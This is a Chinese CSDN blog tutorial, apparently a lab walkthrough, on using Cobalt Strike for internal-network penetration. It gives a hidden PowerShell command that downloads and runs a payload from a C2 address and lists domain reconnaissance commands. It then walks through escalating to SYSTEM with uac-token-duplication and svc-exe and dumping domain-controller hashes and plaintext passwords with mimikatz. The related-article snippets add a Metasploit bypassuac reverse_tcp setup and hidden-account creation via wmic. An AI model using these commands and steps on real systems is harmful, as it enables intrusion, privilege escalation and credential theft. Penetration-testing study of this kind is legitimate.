内网渗透-cs上线之提权测试方法

最新推荐文章于 2024-09-12 16:27:34 发布
最新推荐文章于 2024-09-12 16:27:34 发布
阅读量1.3k 收藏 23
点赞数 19
分类专栏: 内网渗透攻防 文章标签: 安全性测试 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/137746655
版权

cs上线之提权测试方法

在这里我简单给大家介绍如何让目标机器上线,以及上线后如何提高系统权限的方法
这里外网渗透拿到shell的过程我就不介绍了,我直接用cs创建powershell让靶机上线
这里我们简单搭建一下环境和拓扑图
环境搭建:win7,window server 2003,kali,win10
首先我们先打开cs
打开kali服务端和win10的客服端
在这里插入图片描述
在这里插入图片描述
进入到cs
在这里插入图片描述我们打开监听器,这里怎么创建监听器就不介绍了,往期视频都有介绍
在这里插入图片描述
我们打开攻击,生成powershell
在这里插入图片描述
点击之前创建好的test监听器
在这里插入图片描述
在这里插入图片描述
开始攻击
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.222.131:80/a’))”
我们吧powershell复制到靶机上打开
在这里插入图片描述
由于window server 2003没有安装 powershell,我们无法打开,只能通过生成后门程序进行攻击
在这里插入图片描述
在这里插入图片描述
点击程序
在这里插入图片描述
程序已经运行
我们去cs上看看有没有上线了
在这里插入图片描述
靶机上线了,接下来我们就可以进入会话,以及内网信息收集的操作了
在这里插入图片描述成功查看到用户的主机信息了
我们在看看对方主机是否在域内
查看域名
shell wmic computersystem get domain
shell whoami/all
shell ipconfig/all (DNS后缀)
shell net time /domain(域控的时间)
shell nslookup (域名) 查看域控的ip地址

我们可以使用上述命令进行查看域名
在这里插入图片描述
发现是存在域的,且域名为zhian.com
在这里插入图片描述
我们在看看另一台主机也在域内
这时我们再看看哪个主机是域控,使用这个命令很快就可以分辨出来
shell net time /domain
我们对win7输入
在这里插入图片描述
发现访问不了
在访问另外一台试试
在这里插入图片描述
发现访问到了,这个主机就是域控,也就是window server 2003
我们看一下拓扑图
在这里插入图片描述
连上了两台机器,接下来就是对机器提权了,都没有达到system权限
我们提权目的是为了可以进行更高层次的信息收集,获取用户的信息
我们先是提权为*,在提权为system就可以了
我这里的步骤说一下
获得system权限的方法
(执行,提权)
先进行smb监听,发现不行,再用tcp进行监听,(tcp1-test),(uac-token-duplication),点击开始
提升到zhian* 权限
再进行tcp监听,svc-exe模块,提升到system权限

首先对zhian进行提权为zhian*
在这里插入图片描述
我们对准,点击就可以了
这里选择创建好的tcp1协议,选择(uac-token-duplication)模块
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我们可以看到出现了新的上线主机zhian*了
我们进一步提权为system权限,我们选择svc.exe
在这里插入图片描述
点击开始
在这里插入图片描述
输入shell whoami
在这里插入图片描述
发现成功提取为system权限了,接下来对域控进行提权,因为已经是管理员权限了,我们只要提升为system权限就可以了,我们只要进行第二步选择tcp协议和svc.exe就可以了
在这里插入图片描述
成功提权为system权限了
我们看一下拓扑图
在这里插入图片描述
我们查看域控的hash值
在这里插入图片描述点击mimikatz获得明文密码
在这里插入图片描述
在这里插入图片描述
成功获取密码,只需要解密就好了。
我们对win7进行获取hash值
在这里插入图片描述
在这里插入图片描述
成功获得用户信息,实验结束。

炫彩@之星
关注
专栏目录
内网渗透-cobaltstrike之cs上线获取shell
lza20001103的博客
04-30 7689
cobaltstrike之cs上线获取shell
渗透测试 提权
07-18
本文档描述了渗透提权的基本套路
CS的安装和使用,以及提权操作
最新发布
lrs328的博客
09-12 697
新增用户net user [username] [password] /add删除用户net user [username] /delete新增隐藏用户wmic useraccount where "Name='[username]'" call rename "[username]$"删除隐藏用户wmic useraccount where "Name='[username]$'" call rename "[username]"
渗透测试提权
Forget_liu的博客
05-06 515
主要针对网站测试过程中,当测试某一网站时,通过各种漏洞提升webshell权限来拿到该服务器的权限。此时已经获得了站点的webshell权限,提权后获得服务器权限,就可以对站点B,C进行操作。
渗透测试-提权
分享学习网络的点点滴滴
06-09 129
Keylogger木马窃取密码窃取 使用wce去修改用户 首先我们看系统有两个用户,现在我们把sbz改成administrator
【渗透测试笔记】之【提权
AA8j的博客
06-03 542
操作系统默认用户 Windows User Administrator System Linux User Root Windows USER->System WinXP、03 at 10:11 /intertractive cmd Win7、8 sc Create syscmd binPath="cmd /K start" type=own type=interact sc start syscmd 利用开发工具 首先下载微软开发工具包:https://download.sysin
渗透测试框架提权
weixin_43873557的博客
02-10 180
01 Metasploit提权模块 ➢ Meterpreter自动提权命令 getsystem getuid ➢ 提权命令执行失败,绕过uac use exploit/windows/local/bypassuac set payload windows/meterpreter/reverse_tcp set LHOST=192.168.1.170 set session 1 exploit use exploit/windows/local/bypassuac_injection set payloa
内网渗透-cs之钓鱼测试攻击
lza20001103的博客
05-08 3231
cs之模拟钓鱼攻击
内网渗透--CS伪造黄金票据与白银票据
Armandhe的博客
06-24 3801
性感作者,在线翻车
48-4 内网渗透 - Rotten Potato(烂土豆) 提权
weixin_43263566的博客
06-21 593
在渗透测试中,Potato家族是一种常用的提权技术,主要利用Windows服务账户的特权来将已获取的权限提升至系统(SYSTEM)级别。具体而言,Potato家族的攻击方式是将已获得的NT AUTHORITY\SYSTEM账户的访问令牌传递给CreateProcessWithTokenW或CreateProcessAsUserA函数,从而在SYSTEM账户的上下文中启动新进程,从而实现权限提升。,这篇文章介绍的提权方式跟之前最大的优势就是可以通过。,上一篇文章介绍的只能在管理员权限的基础上提升。
渗透测试——权限提升
世间繁华梦一出
03-01 1839
提权一、什么是提权二、怎样进行提权提权的方式有哪些)1、系统漏洞提权(Linux、Windows) 一、什么是提权 提权就是通过各种办法和漏洞,提升自己在服务器中的权限,以便控制全局。 windows:User >> System linux: User >> Root 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件/服务提权 6、WebServer漏洞提权 1、系统
渗透测试技术----提权(本地提权)
wwl012345的博客
07-22 2918
一、开启Kali共享文件夹(拓展,与提权无关) 1.对于很多使用虚拟机的朋友来说,最头疼的就是无法把物理机上的文件移动到虚拟机上,这有两种方法,一种是安装Vmtools软件,还有一种就是开启共享文件夹。方法如下 虚拟机–>设置–>选项–>共享文件夹–>总是启用–>添加–>选择在物理机上建立的文件夹(这一步很重要,如果没有连接到物理机上的共享文件夹,那么相当于没...
渗透测试提权指南
遇事不决冲冲冲
12-04 7579
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]
qwsn
07-04 2714
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! window 服务器常用的是win2003、win2008和win2012。在渗透测试中 ,我们获取的权限是iis_user用户组 ,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。 在iis里面,权限依次的大小对比:,aspx默认能执行终端命令、php和asp如果不能执行命令,在wscript.shell组件没有删除的情况下,可以上传c
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
渗透测试提权方式总结
qq_29864185的博客
07-06 2189
目录 一、 什么是提权 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权 (1)Windows提权 (2)Linux系统提权 2、数据库提权 (1)MySQL数据库提权 3、系统配置不当提权 4、权限继承类提权 5、第三方软件/服务提权6、WebServer漏洞提权 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
提权方式及原理简介(面试)
jklbnm12的博客
02-21 2436
一、提权 想了解原理首先要明白什么叫提权,为什么要提权,通常获取到Shell之后,假如我们拿到的是普通权限比如mysql、tomcat等普通应用权限,那我们如果想在内网畅通无阻,那肯定第一步需要获取到管理员最起码要是administrator甚至是system。 这种获取最高权限的方式就叫提权。 二、提权方式 1、系统本地漏洞提权 2、数据库提权 3、第三方软件提权 4、获取高权限用户比如msf的getsystem提权等 三、分类 Windows提权 Windows提权一般为系统漏洞提权, wmic qf
渗透测试提权-Liinux权限提升
LCW991207的博客
09-24 695
呕心沥血6个小时写成:非漏洞提权(suid,sudo,NFS,PATH,LD_PRELOAD,Cron,DOCKER,LXD)漏洞提权(Linux内核提权漏洞)
Metasploit利用CVE-2018-8120提权:Windows及Linux内网渗透关键漏洞详解
本资源是一份关于Metasploit框架在渗透测试中的应用,特别是利用CVE-2018-8120漏洞对Windows操作系统进行提权的详细教程。作者陈殷来自公众号“山丘安全攻防实验室”,课程主要关注于内网横向渗透策略,即在已控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值